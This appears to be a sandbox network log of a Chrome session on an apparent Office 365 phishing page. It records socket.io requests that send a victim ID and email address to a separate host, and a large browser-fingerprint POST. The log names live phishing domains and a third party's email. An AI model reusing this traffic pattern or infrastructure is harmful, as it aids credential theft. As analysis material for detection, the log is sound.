                                                        2025-03-27 13:42:01 UTC593OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrfbB&sid=F0YwhNqusdKEacySAAfI HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: POST
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:01 UTC955INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:01 GMT
                                                        Content-Length: 0
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B%2FRMd9cfj%2B%2B2EC5C1no8mllrnmMqDIJ1dI%2FkaWZ%2F7NXNQmZtNO4FFWfebeiL9nCUXlVMa1ZuAIkZt0JH%2B4MCOoMBpiwHAghYfxmbEiKQh%2BxomoM7Q2AxLG4%2FxRZguy%2FSpK4lqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f03dce6a3fe-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84415&min_rtt=84393&rtt_var=17837&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1165&delivery_rate=36190&cwnd=252&unsent_bytes=0&cid=3a076aa4075c247a&ts=266&x=0"


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        83192.168.2.549834172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:01 UTC592OUTOPTIONS /socket.io/?EIO=4&transport=polling&t=PNNrfbC&sid=F0YwhNqusdKEacySAAfI HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Access-Control-Request-Method: GET
                                                        Access-Control-Request-Headers: auth_uid,session_email
                                                        Origin: https://www.oyabarista.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:01 UTC375INHTTP/1.1 204 No Content
                                                        Date: Thu, 27 Mar 2025 13:42:01 GMT
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
                                                        Vary: Access-Control-Request-Headers
                                                        Access-Control-Allow-Headers: auth_uid,session_email
                                                        Cf-Cache-Status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f03da3f8ca8-EWR
                                                        alt-svc: h3=":443"; ma=86400


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        84192.168.2.549836172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:01 UTC425OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrfLw HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:01 UTC844INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:01 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 118
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGSk0NDgUnvnTBZeEj0sIL3y9r8WU5NKxifi52TQqYVjdsEMj9pCHOZ58LLDtyyrIO7s4bYSVIX00bEdNqj2kVVWvuNiOx5l4azFrvx%2FnxgFoQrmiOcibMUuPqrk1dYN%2BKm53g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f03dcdc43a3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83619&min_rtt=83603&rtt_var=17653&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=997&delivery_rate=36545&cwnd=252&unsent_bytes=0&cid=9733967c97cc0036&ts=311&x=0"
                                                        2025-03-27 13:42:01 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 79 41 43 36 42 32 67 4e 64 4a 45 54 72 4e 65 76 41 41 66 4a 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                        Data Ascii: 0{"sid":"yAC6B2gNdJETrNevAAfJ","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        85192.168.2.549838172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:01 UTC752OUTPOST /socket.io/?EIO=4&transport=polling&t=PNNrfbB&sid=F0YwhNqusdKEacySAAfI HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Content-Length: 2
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Content-type: text/plain;charset=UTF-8
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:01 UTC2OUTData Raw: 34 30
                                                        Data Ascii: 40
                                                        2025-03-27 13:42:02 UTC836INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:02 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5XlafmtpsV9vMDyZ4SO%2FUrDv7uu1qgml4aGZxIEFeZvEJtY6ZM2qmm7Y4JsUHhNMQ9xAJV7J5SODJF9p2XiPFmZivyASJVSifVeJQXYead9%2FeA0NGZnCCDKQo9UDkAbfNlIpBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f068a58daac-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83883&min_rtt=83848&rtt_var=17743&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1348&delivery_rate=36404&cwnd=253&unsent_bytes=0&cid=591c35cec8f4a424&ts=263&x=0"
                                                        2025-03-27 13:42:02 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                        Data Ascii: 2ok
                                                        2025-03-27 13:42:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        86192.168.2.549839172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:01 UTC692OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrfbC&sid=F0YwhNqusdKEacySAAfI HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        Auth_UID: USER04032025U29030403
                                                        Session_Email: info@kostal.com
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Origin: https://www.oyabarista.com
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Referer: https://www.oyabarista.com/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:02 UTC851INHTTP/1.1 200 OK
                                                        Date: Thu, 27 Mar 2025 13:42:02 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 1
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cache-control: no-store
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L4yXCUGpjKdAuCdo50zqlzPTEx9C3QP%2FnZ4t9iBiiSq%2FjT%2B%2FFxPVreZl%2BGNQgMXl4AS6al%2FddC6QYUcv4PFtbQpoASlZxoU7cWmvhcDzUujEqEXsOJtzkg9LNPE1LfCznnBr9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f06deb5440c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=83780&min_rtt=83685&rtt_var=17797&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1264&delivery_rate=36398&cwnd=252&unsent_bytes=0&cid=2098beb6d556d22e&ts=695&x=0"
                                                        2025-03-27 13:42:02 UTC1INData Raw: 31
                                                        Data Ascii: 1


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        87192.168.2.549840172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:02 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrfbB&sid=F0YwhNqusdKEacySAAfI HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:02 UTC799INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 27 Mar 2025 13:42:02 GMT
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9phbDoRUjUt8S95oh7PmOqRdi1nEWR49cXnTG51yOKCo1kcr3ZCQ%2FipsX1PJuShR0UQ%2FaQ%2FmFA1LTTDOBjAEMZH9dTqD8GenCii4ItBmxqMvUMHLpPddf3%2BC49oKMpQNkPf5Ug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 926f4f094fcb728f-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=84077&min_rtt=84030&rtt_var=17799&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1022&delivery_rate=36307&cwnd=240&unsent_bytes=0&cid=87d3cd42ec02b259&ts=308&x=0"
                                                        2025-03-27 13:42:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        88192.168.2.549830104.21.70.2324436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:02 UTC1041OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com HTTP/1.1
                                                        Host: www.oyabarista.com
                                                        Connection: keep-alive
                                                        Content-Length: 147028
                                                        Cache-Control: max-age=0
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Origin: https://www.oyabarista.com
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
                                                        Referer: https://www.oyabarista.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU5ITnVVMmM9JnVpZD1VU0VSMDQwMzIwMjVVMjkwMzA0MDM=N0123Ninfo@kostal.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-27 13:42:02 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                        Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                        2025-03-27 13:42:02 UTC16384OUTData Raw: 32 43 25 32 32 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42
                                                        Data Ascii: 2C%22XMLHttpRequest%22%3A%22function+XMLHttpRequest%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22XMLDocument%22%3A%22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B
                                                        2025-03-27 13:42:02 UTC16384OUTData Raw: 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 53 74 72 69 6e 67 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 6e 69 6d 61 74 65 64 52 65 63 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 53 56 47 41 6e 69 6d 61 74 65 64 50 72 65 73 65 72 76 65 41 73 70 65 63 74 52 61 74 69 6f 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69
                                                        Data Ascii: Bnative+code%5D+%7D%22%2C%22SVGAnimatedString%22%3A%22function+SVGAnimatedString%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedRect%22%3A%22function+SVGAnimatedRect%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22SVGAnimatedPreserveAspectRatio%22%3A%22functi
                                                        2025-03-27 13:42:02 UTC16384OUTData Raw: 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 6f 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62 6c 65 43 65 6c 6c 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 54 61 62 6c 65 43 61 70 74 69 6f 6e 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 54 61 62
                                                        Data Ascii: 7D%22%2C%22HTMLTableColElement%22%3A%22function+HTMLTableColElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCellElement%22%3A%22function+HTMLTableCellElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLTableCaptionElement%22%3A%22function+HTMLTab
                                                        2025-03-27 13:42:02 UTC16384OUTData Raw: 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4c 61 79 65 72 42 6c 6f 63 6b 52 75 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 77 6f 72 64 56 61 6c 75 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 43 53 53 4b 65 79 66 72 61 6d 65 73 52 75 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 43 53 53 4b 65 79 66
                                                        Data Ascii: B+%5Bnative+code%5D+%7D%22%2C%22CSSLayerBlockRule%22%3A%22function+CSSLayerBlockRule%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeywordValue%22%3A%22function+CSSKeywordValue%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22CSSKeyframesRule%22%3A%22function+CSSKeyf
                                                        2025-03-27 13:42:02 UTC16384OUTData Raw: 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 46 69 6c 65 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 46 69 6c 65 53 79 73 74 65 6d 48 61 6e 64 6c 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 46 69 6c 65 53 79 73 74 65 6d 57 72 69 74 61 62 6c 65 46 69 6c 65 53 74
                                                        Data Ascii: %28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemFileHandle%22%3A%22function+FileSystemFileHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemHandle%22%3A%22function+FileSystemHandle%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22FileSystemWritableFileSt
                                                        2025-03-27 13:42:02 UTC16384OUTData Raw: 32 25 32 43 25 32 32 54 61 73 6b 53 69 67 6e 61 6c 25 32 32 25 32 43 25 32 32 54 61 73 6b 50 72 69 6f 72 69 74 79 43 68 61 6e 67 65 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 54 61 73 6b 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 32 43 25 32 32 54 61 73 6b 41 74 74 72 69 62 75 74 69 6f 6e 54 69 6d 69 6e 67 25 32 32 25 32 43 25 32 32 53 79 6e 63 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 53 75 62 6d 69 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 4c 69 73 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 53 68 65 65 74 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 52 65 61 64 4f 6e 6c 79 25 32 32 25 32 43 25 32 32 53 74 79 6c 65 50 72 6f 70 65 72 74 79 4d 61 70 25 32 32 25 32 43 25 32 32 53 74 6f 72
                                                        Data Ascii: 2%2C%22TaskSignal%22%2C%22TaskPriorityChangeEvent%22%2C%22TaskController%22%2C%22TaskAttributionTiming%22%2C%22SyncManager%22%2C%22SubmitEvent%22%2C%22StyleSheetList%22%2C%22StyleSheet%22%2C%22StylePropertyMapReadOnly%22%2C%22StylePropertyMap%22%2C%22Stor
                                                        2025-03-27 13:42:02 UTC16384OUTData Raw: 32 63 6c 6f 73 65 25 32 32 25 32 43 25 32 32 63 6f 6e 66 69 72 6d 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 49 6d 61 67 65 42 69 74 6d 61 70 25 32 32 25 32 43 25 32 32 66 65 74 63 68 25 32 32 25 32 43 25 32 32 66 69 6e 64 25 32 32 25 32 43 25 32 32 66 6f 63 75 73 25 32 32 25 32 43 25 32 32 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 25 32 32 25 32 43 25 32 32 67 65 74 53 65 6c 65 63 74 69 6f 6e 25 32 32 25 32 43 25 32 32 6d 61 74 63 68 4d 65 64 69 61 25 32 32 25 32 43 25 32 32 6d 6f 76 65 42 79 25 32 32 25 32 43 25 32 32 6d 6f 76 65 54 6f 25 32 32 25 32 43 25 32 32 6f 70 65 6e 25 32 32 25 32 43 25 32 32 70 6f 73 74 4d 65 73 73 61 67 65 25 32 32 25 32 43 25 32 32 70 72 69 6e 74 25 32 32 25 32 43 25 32 32 70 72 6f 6d 70 74 25 32 32 25 32 43 25 32 32
                                                        Data Ascii: 2close%22%2C%22confirm%22%2C%22createImageBitmap%22%2C%22fetch%22%2C%22find%22%2C%22focus%22%2C%22getComputedStyle%22%2C%22getSelection%22%2C%22matchMedia%22%2C%22moveBy%22%2C%22moveTo%22%2C%22open%22%2C%22postMessage%22%2C%22print%22%2C%22prompt%22%2C%22
                                                        2025-03-27 13:42:02 UTC15956OUTData Raw: 53 74 61 6d 70 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 74 69 6d 65 53 74 61 6d 70 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 6f 6e 74 65 78 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 6f 6e 74 65 78 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 54 61 73 6b 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 54 61 73 6b 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6d 65 6d 6f 72 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 4d 65 6d 6f 72
                                                        Data Ascii: Stamp%22%3A%22function+timeStamp%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22context%22%3A%22function+context%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createTask%22%3A%22function+createTask%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22memory%22%3A%22%5Bobject+Memor


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        89192.168.2.549842172.64.80.14436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-27 13:42:02 UTC450OUTGET /socket.io/?EIO=4&transport=polling&t=PNNrfbC&sid=F0YwhNqusdKEacySAAfI HTTP/1.1
                                                        Host: mssnet0nses.click
                                                        Connection: keep-alive
